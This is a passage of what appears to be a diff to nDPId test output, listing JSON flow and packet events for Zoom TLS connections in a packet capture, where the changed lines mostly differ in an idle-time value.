-00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470776,"flow_last_seen":1569520470801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470801,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470742,"flow_last_seen":1569520470810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470810,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470769,"flow_last_seen":1569520470814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470814,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470742,"flow_last_seen":1569520470820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470820,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470755,"flow_last_seen":1569520470822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":200,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470769,"flow_last_seen":1569520470822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":204,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470776,"flow_last_seen":1569520470828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470828,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470755,"flow_last_seen":1569520470829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470829,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470776,"flow_last_seen":1569520470837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470837,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470776,"flow_last_seen":1569520470776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470776,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569520470776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470776,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGFlLAqAF11fSMVNZWAbv57BLmAAAAALAC\/\/8ncAAAAgQFtAEDAwUBAQgKJZzgpQAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1569520470787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470787,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGIyPVE5BowKgBdQG71lTDwlhoC7yJ3KASqbBbBgAAAgQFrAQCCAp7WhBHJZzgkQEDAww="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1569520470787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470787,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGEyvAqAF11ROQaNZUAbsLvIncw8JYaYAQECwjNgAAAQEICiWc4K97WhBH"} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470755,"flow_last_seen":1569520470787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470787,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569520470790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470790,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1XV9IxVwKgBdQG71lXIKlM86vs2SKASqbDi9AAAAgQFrAQCCAp4gwNrJZzgnwEDAww="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1569520470790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470790,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl3AqAF11fSMVdZVAbvq+zZIyCpTPYAQECyrLwAAAQEICiWc4LJ4gwNr"} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470769,"flow_last_seen":1569520470790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470790,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569520470801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520470801,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGI1bV9IxUwKgBdQG71lYtiv8U+ewS56ASqbDdrgAAAgQFrAQCCAp8tQexJZzgpQEDAww="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569520470801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470801,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGFl7AqAF11fSMVNZWAbv57BLnLYr\/FYAQECyl5QAAAQEICiWc4Lx8tQex"} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470776,"flow_last_seen":1569520470801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470801,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470742,"flow_last_seen":1569520470810,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470810,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470769,"flow_last_seen":1569520470814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470814,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470742,"flow_last_seen":1569520470820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470820,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470755,"flow_last_seen":1569520470822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":200,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470769,"flow_last_seen":1569520470822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":204,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470776,"flow_last_seen":1569520470828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470828,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470755,"flow_last_seen":1569520470829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470829,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470776,"flow_last_seen":1569520470837,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470837,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy 